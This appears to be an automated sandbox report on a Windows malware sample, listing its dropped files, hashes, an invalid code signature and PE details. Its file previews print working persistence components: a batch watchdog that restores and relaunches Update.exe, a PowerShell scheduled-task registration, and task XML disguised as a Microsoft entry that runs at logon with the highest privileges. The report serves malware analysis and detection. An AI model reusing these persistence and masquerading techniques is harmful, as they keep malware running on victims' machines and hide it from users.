Process:	C:\Users\user\Desktop\Uulw5M1DfU.exe
File Type:	data
Category:	dropped
Size (bytes):	63227696
Entropy (8bit):	7.999995315458035
Encrypted:	true
SSDEEP:	1572864:sWhwN07asv+9VzfaL+s0ige/3Il9WLbtuMrOH0gJ9A:sS007as2bzfaLBV/gmLbZCUgLA
MD5:	B4FB932CDAAA009DFCE48C94D514DC20
SHA1:	24B87000FCF2E059DCEAA348CCE265F5F1C5FD3F
SHA-256:	54064B151392FF87F7776AB8EE9807030FEAF87566DDC6251E7F66CF0D7ADEB6
SHA-512:	7612E474FAF8FFF74DC12870BCAE09FCF9AD5CCFE49559239517367598EA240403710DBFE58E3496D4411F2147866C7754DB15D73848973465370107CD828141
Malicious:	false
Preview:	..>..9..x...@...~G.d.....j;%l.....;..w-.HD.!.O..}..6rTX.g..P[3.F...j.nH..U>..d]. ...6..D4.F.r.C_..0....u.....J^'V.b......!q..]j....e8S..........0R=[.j.\..D...........k.Nq..y.S.1.....]N.?.b...$..4.jv..t!3I......U.K.....?.@.=..\|...=L.z.A3...m..'D........g.I.......O.,q.....%.$......Y.....lw479.PRK.VN..>..}.X.......s..'...h.d.\HS.'e......g.t.........7k.]9..q..Y5.........~~...@\....."L..u.IQ.4M...?..b.I.0w...:...i]..&.q.s[...c.A...`.]5.p..D...!.q........:....4M...W#RM...........2......)h..@..q....D6sA4.`..aj...M.om........IT"5.j..[...Bs...L...`.}..r..%..B...qb.J.vQ...g......2Xf.v.,.uK.5...k....K..rh....,.}.B...O...^$..Dtsw..g...F.m.....n.[\|.vp0...........}..4w....9.r.WX.Mu2.G.=j.%......P...Lsdy....w..e....2..i.....q\m..M.a.V..8CP5.....L'.'..=..../.?...B+..."X'm9 ........n.!......o)J.q...YQ.liEL..F.[..W.i.....w...>....-....r..R........\.S......{c....%..P74....z...S..N......)A..t...Z.)....a...+[.x.....R..+$.f.6..u.......Y./.r:.S..

C:\Users\Public\Bilite\ldplayer9_ld_6000_ld.exe

Download File

Process:	C:\Users\user\Desktop\Uulw5M1DfU.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4540512
Entropy (8bit):	7.278249613007746
Encrypted:	false
SSDEEP:	98304:vevwfTovd3ZIdCCFQfUfQ8aA78VREwBwMu:meol3ZIdCxujaAqRgMu
MD5:	EC1580551A183D46B8BE885B7519F1D5
SHA1:	4D5B0038633B92A11C3AAFD33DAAFF54D354FD91
SHA-256:	D0B485BCBD919FA05653281A9F1AB5B574D19A47AACBFAD89D411B946763FA1A
SHA-512:	759C4266DFA1168C6E91791AF71B946F3EE0E217B3CFFDD670BD6E7A811CBB2BECA0F5D9CE7ED06A40BE75C9FE735BBDD767E8A5F1AC6F61F61DB7FA47532D05
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........r.................E1............n........J............n.....n............n....n.......n.......n...................n.....Rich...........PE..L....:eg.................."..D#...............#...@..........................pF.......E...@..................................K.\|....p,..............D.`R... E..D....#.8............................7).@.............#..............................text...V."......."................. ..`.rdata...d....#..f....#.............@..@.data...............h*.............@....rsrc.......p,.......+.............@..@.reloc...D... E..F....C.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	5.410330802539769
Encrypted:	false
SSDEEP:	24:3gOWSKco4KmZjKbmOIKod6emN1s4RPQoU99tXt/NK3R88bJ02iaEW3b5:QOWSU4xympjms4RIoU99tlNWR832qab5
MD5:	86573B2CBAF1D263D00F31AFBBC1656E
SHA1:	4B5A1635AEAF826CFAE1E5EFACD3238BC29CEE8E
SHA-256:	2056A4F86A03C85E1A32CA1EA013B07BB9BA809DA46C2BA56A2F62FB7117BA94
SHA-512:	C33F152CDB4EEF1263D9AA9064AA192E14CD72D9C879D6733DBBB3DF9333FF8B6945BDEB20AD8293CD6416C2933E71F94D8062E44B8521AB336E770C768F0886
Malicious:	false
Preview:	@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\PolicyManagement.xml

Download File

Process:	C:\Users\Public\Bilite\Axialis\Update.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1893
Entropy (8bit):	5.212287775015203
Encrypted:	false
SSDEEP:	48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
MD5:	E3FB2ECD2AD10C30913339D97E0E9042
SHA1:	A004CE2B3D398312B80E2955E76BDA69EF9B7203
SHA-256:	1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
SHA-512:	9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqzi4iyg.ehu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdetx00k.jdm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktysmd5v.a2x.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqrb0oyd.o1m.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnegupyr.bqi.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qqjvolhi.vxu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ynv4ujhw.0vy.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zthbtk3n.3oz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\backup.dll

Download File

Process:	C:\Users\Public\Bilite\Axialis\Update.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	340760
Entropy (8bit):	6.543019915715004
Encrypted:	false
SSDEEP:	6144:H66LUtNhlhaEDW8zn0iuAhzRgd5KrS8a1GJAlExz30/jUaCcM:H66LUtNrIAzCKzRgDKrSeoUalM
MD5:	D8B8211D3CF9185D5C882AEF534CFA79
SHA1:	157FDE2C93A2A96726C49755C787E805EDE6E980
SHA-256:	A250C7CF1645BB2672DE489C1E1164EE0230703A6AC8E8AB8DE6D42E9EAC476C
SHA-512:	440E656B42997359CC32647564927AD8D0A65383E7340A7871B62FD87112A3A79C38D4409FA7DEB94C33B297895E522C1ACC9E8AAF7BCE96296CF99EA6F9EDAB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....mg...........!.........L......Y........................................p............@..........................t..O....t..........p6...............)...@...&...r.......................4.......................w...............................text............................... ..`.rdata..............................@..@.data....!..........................@....00cfg..............................@..@.tls................................@....rsrc...p6.......8..................@..@.reloc...&...@...(..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\backup.exe

Download File

Process:	C:\Users\Public\Bilite\Axialis\Update.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	395368
Entropy (8bit):	5.090673225697451
Encrypted:	false
SSDEEP:	6144:I0acLF3rgypB1Grf/TRfiJ7BePaEvLJggZy:Y/TRfi3ePtJRg
MD5:	FB325C945A08D06FE91681179BDCCC66
SHA1:	F5D91B7D75D34E156066AB4099E0FD0DF9227B32
SHA-256:	0C2CC4513EC9101A28A7988C72A46175EFD82F387BB3BCFB2612E808804282B5
SHA-512:	2BB588EBE2FA35D03652AEC4E5D51DABD3A24E996336A4D5EC9C762D6084862D5CD5F530F1DA0B98D2887BA88F4E077697D128071FF497D2967F9F42ADC2F533
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[...[...[...#l..[.......[.......[.......[.......[..b....[..e....[...0...[...[...[..e....[..e....[...[h..[..e....[..Rich.[..........................PE..L...X..e............................\........ ....@..................................8....@.................................D(.......@..................h(...........!..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0.......$..............@....rsrc........@.......&..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\monitor.bat

Download File

Process:	C:\Users\Public\Bilite\Axialis\Update.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	769
Entropy (8bit):	5.113976261619789
Encrypted:	false
SSDEEP:	24:NFW/WAW/WAWE3fzWcWrfZKx31SIYaYZLZ6y:NFVAVAjvz6ZKx31SIYN/6y
MD5:	F7F23953F7C236A0F12AE4848F174480
SHA1:	E222C191BE437B39FB294EDD1FCCAF961B1F7265
SHA-256:	0CD1B31F9AA2F089BD33331B172CD4813167BD59F889EFDC7EB2ADAA71F3D9CC
SHA-512:	2790AFD071756E25FF408426E0D40879603EBCBC23C1D98AD891017237A2930F27CC19F28C38C5BAB5221E828B0B08727EDCEC1D2AA528FCCED0B7EE576836B8
Malicious:	false
Preview:	@echo off..:CheckProcess..set "ProcessName=Update.exe"..set "ProcessPath=C:\Users\Public\Bilite\Axialis\Update.exe"..set "BackupProcessPath=C:\Users\user\AppData\Local\Temp\\backup.exe"..set "DLLPath=C:\Users\Public\Bilite\Axialis\Update.dll"..set "BackupDLLPath=C:\Users\user\AppData\Local\Temp\\backup.dll"..if not exist "%ProcessPath%" (.. echo Process file not found, restoring from backup..... copy /Y "%BackupProcessPath%" "%ProcessPath%"..)..if not exist "%DLLPath%" (.. echo DLL file not found, restoring from backup..... copy /Y "%BackupDLLPath%" "%DLLPath%"..)..tasklist /FI "IMAGENAME eq %ProcessName%" \| findstr /I "%ProcessName%" >nul..if %ERRORLEVEL% neq 0 (.. start "" "%ProcessPath%"..)..timeout /t 30 /nobreak >nul..goto CheckProcess..

C:\Users\user\AppData\Local\Temp\monitor.pid

Download File

Process:	C:\Users\Public\Bilite\Axialis\Update.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:N7n:Bn
MD5:	DF0AAB058CE179E4F7AB135ED4E641A9
SHA1:	3C457CE18C2E37A4437E0201076AD638367EF0EA
SHA-256:	542CACAE1D41132AC9E10320DC19210336F60EE3B2D5BB64838EFF7556132823
SHA-512:	D96D0F8A58814D18C6D3530474F93798132C5B46E84BF72029933F74D9DEB2CE81E1F01156422E65034DBB55652FB6A6D06A33FA6B814696C816CD820675E130
Malicious:	false
Preview:	1148

C:\Users\user\AppData\Local\updated.ps1

Download File

Process:	C:\Users\Public\Bilite\Axialis\Update.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.741657013789009
Encrypted:	false
SSDEEP:	3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
MD5:	AA0E1012D3B7C24FAD1BE4806756C2CF
SHA1:	FE0D130AF9105D9044FF3D657D1ABEAF0B750516
SHA-256:	FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
SHA-512:	15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
Malicious:	true
Preview:	$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath \| Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName

C:\Users\user\Desktop\ldplayer9_ld_6000_ld.exe.lnk

Download File

Process:	C:\Users\Public\Bilite\Axialis\Update.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Jan 4 12:47:37 2025, mtime=Sat Jan 4 12:47:37 2025, atime=Tue Dec 24 02:25:35 2024, length=4540512, window=hide
Category:	dropped
Size (bytes):	1101
Entropy (8bit):	4.711710491062973
Encrypted:	false
SSDEEP:	12:8y3FNY0UlGIOTCICHqXzRF9XI8lCACmq6BTvsCJJPD6g9fojAs2cTzGT9fBav0hq:8JtGtjju8lzlvn5rfsAsjWfovuTqyFm
MD5:	BD8562D68EFD41706AA308059F3FE965
SHA1:	573EDB8BC36DDC287712EA65F1490B1BDA0D373B
SHA-256:	6A99686DA48FC1B5C07575E45DC4BEDEE45FBA2FCA704A57F4F0E9413863596A
SHA-512:	134984088C38974E8191666D9F69941DB65004E62F9949E1D4DAA5E3D21718241447A325C97FD038DF0CAB51BA73FF93F7AA83F979FD9DB6681A742FDD37ADD6
Malicious:	false
Preview:	L..................F.... ......6.^...I.6.^....~.U..`HE..........................P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwH$Z.m....................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....\|.1.....$Z.m..Public..f......O.I$Z.m....+...............<......(,.P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....T.1.....$Z.m..Bilite..>......$Z.m$Z.m...........................$..B.i.l.i.t.e.....~.2.`HE..Y2. .LDPLAY~1.EXE..b......$Z.m$Z.m............................c.l.d.p.l.a.y.e.r.9._.l.d._.6.0.0.0._.l.d...e.x.e.......^...............-.......].............L......C:\Users\Public\Bilite\ldplayer9_ld_6000_ld.exe..,.....\.....\.P.u.b.l.i.c.\.B.i.l.i.t.e.\.l.d.p.l.a.y.e.r.9._.l.d._.6.0.0.0._.l.d...e.x.e..........v..*.cM.jVD.Es.!...`.......X.......305090...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.292361616376963
Encrypted:	false
SSDEEP:	3:hYFRZARcWmFsFJQZ/ctXvY/4to/9uF8cttEfYhnn:hYFRamFSQZ0lv5y/9JctESnn
MD5:	7689D6E1AC4668D07ACB657413767158
SHA1:	860195BB8E4C696138711AEE8EBCB62D502E3D45
SHA-256:	1FCD0C76A32240DE46DEEB703A1A915A00C101DA60815B2C6845316FE7E18267
SHA-512:	63D316D45C0CBCEE68808819C984AEAA4D13C4B5FC03A54D88F7A5297D88C9041FFEFD7232A3DA9F5DEC8097E5B62B9035D3BAE9B98BD70663AFF1D1CBF21A9B
Malicious:	false
Preview:	..Waiting for 30 seconds, press CTRL+C to quit .....29..28..27..26..25..24..23..22..21..20..19..18..17..16..15

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.999857872985788
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Uulw5M1DfU.exe
File size:	67'003'808 bytes
MD5:	f889fe126788ffbafc2e0cd5e233fee9
SHA1:	30e1effa7018af4275713a9bb4e653455d31f93f
SHA256:	0dbb48aad54c1f2361dbc58d9f22748df9156d8709554ad20f843811657c26d4
SHA512:	106dbaef01209fe852ccfd42161dc02ab5f430044887de097da05dba8dff93641fd1e479f88d4b849d47e529eb7a189e59dfdfea586e40583a75c320e3352275
SSDEEP:	1572864:/JuV0U0BEONYYPPm5FYyrHK+UEEHcum2gct79Sdye:BuV0U02Op29qbH/Xlt7Mdv
TLSH:	6BE7338A378CB279C51242BFE0D03BE70BF5DB9A75142E39616D1A844ED6453E78F0CA
File Content Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................................0....@..........................@...............................................P.......................<...).

File Icon


Icon Hash:	01e0f2ccd4d4c400

Static PE Info

General

Entrypoint:	0x411def
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b5a014d7eeb4c2042897567e1288a095

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	18/07/2022 01:00:00 18/07/2024 00:59:59
Subject Chain	CN=Incredibuild Software Ltd., O=Incredibuild Software Ltd., S=Tel Aviv, C=IL
Version:	3
Thumbprint MD5:	8164525B12F9B6829CCD5054865F2D41
Thumbprint SHA-1:	583F01EE72450A9945FB1CFA539BAAB983D3F1D9
Thumbprint SHA-256:	2EBD549CFBD28201F8773F370E920A21BB010F577BA74B4726332D2CE7836F69
Serial:	7098774ED29B0565AB114EF2F2871CF7

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00414C50h
push 00411F80h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [00413184h]
pop ecx
or dword ptr [00419924h], FFFFFFFFh
or dword ptr [00419928h], FFFFFFFFh
call dword ptr [00413188h]
mov ecx, dword ptr [0041791Ch]
mov dword ptr [eax], ecx
call dword ptr [0041318Ch]
mov ecx, dword ptr [00417918h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00413190h]
mov eax, dword ptr [eax]
mov dword ptr [00419920h], eax
call 00007F2368B5A702h
cmp dword ptr [00417710h], ebx
jne 00007F2368B5A5EEh
push 00411F78h
call dword ptr [00413194h]
pop ecx
call 00007F2368B5A6D4h
push 00417048h
push 00417044h
call 00007F2368B5A6BFh
mov eax, dword ptr [00417914h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00417910h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0041319Ch]
push 00417040h
push 00417000h
call 00007F2368B5A68Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x150dc	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a000	0x190d7	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x3fe3c88	0x2918
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13000	0x310	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x11317	0x11400	797279c5ab1a163aed1f2a528f9fe3ce	False	0.6174988677536232	data	6.576987441854239	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x30ea	0x3200	1359639b02bcb8f0a8743e6ead1c0030	False	0.43828125	data	5.549434098115495	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x17000	0x292c	0x800	9415c9c8dea3245d6d73c23393e27d8e	False	0.431640625	data	3.6583182363171756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1a000	0x190d7	0x19200	aedf42f084dabb70902985d8cb8d4f42	False	0.14223802860696516	data	4.481844282645869	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1a208	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Russian	Russia	0.42819148936170215
RT_ICON	0x1a670	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Russian	Russia	0.2767354596622889
RT_ICON	0x1b718	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Russian	Russia	0.2513485477178423
RT_ICON	0x1dcc0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	Russian	Russia	0.17170524326877656
RT_ICON	0x21ee8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	Russian	Russia	0.09922512717378446
